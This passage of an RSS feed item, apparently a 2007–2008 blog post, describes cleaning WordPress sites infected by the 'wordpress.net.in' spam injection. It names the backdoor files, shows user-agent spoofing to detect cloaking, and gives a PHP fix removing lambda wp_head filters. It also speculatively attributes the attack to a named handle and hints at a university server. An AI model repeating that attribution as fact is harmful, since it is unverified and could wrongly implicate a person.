<li><a href="http://xref.redalt.com/wptrunk/wp-includes/gettext.php.source.htm">gettext.php</a></li>
</ul>
<p class="mgt">The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a <a href="http://codex.wordpress.org/Upgrading_WordPress">full upgrade</a>.</p>
<dl class="r" style="padding:18px 2px;margin:18px 0px;border:1px solid #ccc;border-width:1px 0pt">
<dt class="title">Dec 13, 2007</dt>
<dd>
<p>I just notice this recently. You&#8217;ll need to check your site HTTP Header. Most of the hijacked websites doesn&#8217;t response with correct HTTP Status Header <tt class="di">(400<>500)</tt>. My guess is they did this to cloak from being crawl by search engine spiders. If you had cleaned all the infected files and your header doesn&#8217;t response correctly get a <a class="exturl icn-r1" href="http://www.google.com/search?q=apache+rootkit+scans">rookit scanner</a>.</p>
</dd>
<dd>
<p class="notice">Check your website status header, try cloak your browser (UA) as Search Engine Crawler. The following screenshot will show you how to setup this at web-sniffer.net.</p>
<p><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/change-user-agent-strings-as-googlebot.png' alt='change user agent strings as googlebot' style="padding:10px 2px;margin:10px 0px;border:1px solid #eee" width="584" height="274" longdesc="http://blog.kakkoi.net/wp-content/uploads/2007/12/change-user-agent-strings-as-googlebot.png" />
<p>This methods may not work if the cloaking scripts used IP base tracking. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver). </p>
<h3>Firefox Browser</h3>
<p>You can also override your useragent string with firefox &darr;.</p>
<p> <tt class="db" style="padding:3px;background-color:#fff7c7;color:#333">about:config &rarr; general.useragent.overide = &#8216;<a href="http://www.google.com/search?q=search+engine+user+agent" rel="external nofollow" rev="google:query">ua strings</a>&#8216;</tt></p>
</dd>
</dl>
<h3>Wordpress.net.in Backdoor</h3>
<p><a href='#' id='open-extra-info' onclick='wpi_fxToggle("#extra-info");return false;'>Extra info</a></p>
<dl class="r">
<dd id="extra-info" style="display:none"><strong>Dec 14, 2007</strong>
<p>I did some research at <a href="http://www.archive.org">archive.org</a>. It seem our wordpress.net.in Seo Spam has been going on since 2005. The first variant used file_get_contents() PHP functions to retrieve their sources code (A <a href="http://www.phpclasses.org/browse/file/7820.html">UTF MAP Decoder</a> 1974 Php Class ). </p>
<p>I also found a signature name <strong>alxumuk</strong> (at MIT &#038; wordpress.net.in). His first historic test can be root back at <tt>*.media.mit.edu/~?</tt> server (I hide the userid as it may be &#8220;false positive&#8221;). After my first search on google for alxumuk all the results has been scraped out by Google &#038; &#8220;Google alert&#8221; so there is no references to this query in Google Index.</p>
<p>My query for <tt class="db" style="padding:3px;background-color:#fff7c7;color:#333">file_get_contents include require allintext:1974.*</tt> (the UTF decode package) and the signature (alxumuk) will return <em>403 Forbidden</em>.</p>
<p style="text-align:center"><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/google-advance-query-403.jpg' alt='Google advance query 403' longdesc="http://blog.kakkoi.net/wp-content/uploads/2007/12/google-advance-query-403.jpg" width="469" height="600" /></p>
<p>As <a href="http://www.google.com/advanced_search?hl=en" hreflang="en" rel="external" rev="google:search">Google Advanced Search</a> blocked &#8220;the query&#8221; this may confirm that 1974.* (UTF decode) is probably the package for reading the bootstrap for wordpress.net.in backdoor (similar case like perl.santy net worm).</p>
<p> If this is a true Net Worm, I suggest anyone with older versions of Wordpress should removed\ the meta generator tag (Wordpress versions) and disabled XML-RPC(&#038; RSD) for <a href="http://www.google.com/search?q=hardening+wordpress">hardening wordpress</a> from remote vectors vulnerabilities.</p>
</dd>
</dl>
<h2>Wordpress.net.in Doorway</h2>
<p><span class="fw">Dec 24, 2007</span> &rarr; <tt class="di">http://www.wordpress.net.in/mentors/alxumuk/</tt></p>
<h2>Backdoor Files</h2>
<p>inside <tt class="di">wp-includes</tt> directory.</p>
<ul>
<li>compat.php - <small>(replace with latest version)</small></li>
<li>class-mail.php <small>delete</small></li>
</ul>
<p>scan &#038; removes all backdoor files and create a <tt class="di">.htaccess</tt> file inside <tt class="di">wp-includes</tt> &#038; <tt class="di">wp-content/plugins</tt>. Then add the following code to disabled directory listing (prevent informations leak &#038; Directory search index).</p>
<pre class="smallbox">Options -Indexes</pre>
<h2>Wordpress.net.in New Partner</h2>
<p><small>Feb 23th 2008</small>, We found a similar signature like wordpress.net.in at qwetro.com (germany). Probably from the same attacker with different agenda. </p>
<h2>removes malicious create_function wp_head filters</h2>
<p>This are fixes for <strong class="fw-">wordpress.net.in spams</strong> header injection.</p>
<pre class="prebox">&#47;&#42;&#42;
 &#42; Remove create_function action hook
 &#42; append on wordpress wp_head filters
 &#42;
 &#42; &#64;author Avice De&#39;v&#233;reux &#60;ck&#64;kaizeku&#46;com&#62;
 &#42; &#64;copyright Copyright &#40;c&#41; 2006 Avice De&#39;v&#233;reux
 &#42; &#64;version 1&#46;0
 &#42; &#64;license http&#58;&#47;&#47;www&#46;gnu&#46;org&#47;licenses&#47;lgpl&#46;html GNU Lesser General Public License
 &#42; &#64;link http&#58;&#47;&#47;blog&#46;kaizeku&#46;com&#47;wordpress&#47;goro&#45;spam&#45;injection&#45;wp&#45;head&#45;patch&#47;
 &#42;&#47;
function remove_create_function_action&#40;&#41;
&#123; global &#36;wp_filter&#59;

	&#36;action_ref	&#61; &#39;wp_head&#39;&#59;
	&#36;filter 	&#61; &#36;wp_filter&#91;&#36;action_ref&#93;&#59;
	&#36;_lambda	&#61; array&#40;&#41;&#59;

	foreach&#40;range&#40;1&#44;10&#41; as &#36;priority&#41;&#123;

		if &#40;isset&#40;&#36;filter&#91;&#36;priority&#93;&#41;&#41;
		&#123;
			foreach&#40;&#36;filter&#91;&#36;priority&#93; as &#36;registered_filter &#41;&#123;

				&#36;callback &#61; &#40;string&#41; &#36;registered_filter&#91;&#39;function&#39;&#93;&#59;

				if &#40; preg_match&#40;&#34;&#47;lambda&#47;&#34;&#44; &#36;callback&#41; &#41; &#123;
		 	 		&#36;_lambda&#91;&#36;priority&#93;&#91;&#93; &#61; &#36;callback&#59;
				&#125;
			&#125;

		&#125;
	&#125;

	if &#40; count&#40;&#36;_lambda&#41; &#62;&#61; 0 &#41;&#123;

		foreach&#40;&#36;_lambda as &#36;priority &#61;&#62; &#36;callback&#41; &#123;
			if &#40; has_filter&#40;&#36;action_ref&#44;&#36;callback&#41; &#41;&#123;
				remove_filter&#40;&#36;action_ref&#44; &#36;callback&#44; &#36;priority&#44; 1&#41;&#59;
			&#125;
		&#125;
	&#125;
&#125;

add_action&#40;&#39;init&#39;&#44;&#39;remove_create_function_action&#39;&#41;&#59;
</pre>
<p>The plugin&#8217;s can be download at <a href="http://blog.kaizeku.com/wordpress/goro-spam-injection-wp-head-patch/">Kaizeku Ban, goro spam injection fixes</a></p>
<h2 class="cb mgb-" id="rel-links">Related Posts</h2>
<ul class="xoxo exturl">
<li><a href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked" title="Bluehost HostMonster CEO Blog hacked (wordpress.net.in)" rev="site:related" rel="archive" class="inturl">Bluehost HostMonster CEO&#8217;s Blog hacked (wordpress.net.in)</a></li>
<li><a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/" title="Matt Heaton Bluehost Hostmonster CEOs Hacked Again - Strike II" rev="site:related" rel="archive" class="inturl">Matt Heaton Bluehost Hostmonster CEO&#8217;s Hacked Again - Strike II</a></li>
</ul>
<h2 class="cb mgt mgb-" id="extt-links">External Links</h2>
<ul class="xoxo exturl">
<li><a rel="nofollow robots-nofollow" href="http://web-sniffer.net/">Websniffer View HTTP Request and Response Header</a></li>
<li><a rel="nofollow robots-nofollow" href="/uri/d29yZHByZXNzLm9yZy9zdXBwb3J0L3RvcGljLzE0NTg4MQ.curie,80,302">Wordpress Support Forum</a></li>
<li><a rel="nofollow" href="http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-4743" rel="external" rev="nist:nvd">National Vulnerability Database Wordpress 2.0 > 2.0.6</a></li>
</ul>
<h3 class="cb mgt title-">Short URL</h3>
<ul class="xoxo dn">
<li>
<input type="text" size="40" class="on-click-select" value="http://blog.kakkoi.net/ref/fixwpblackhatspam" /></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
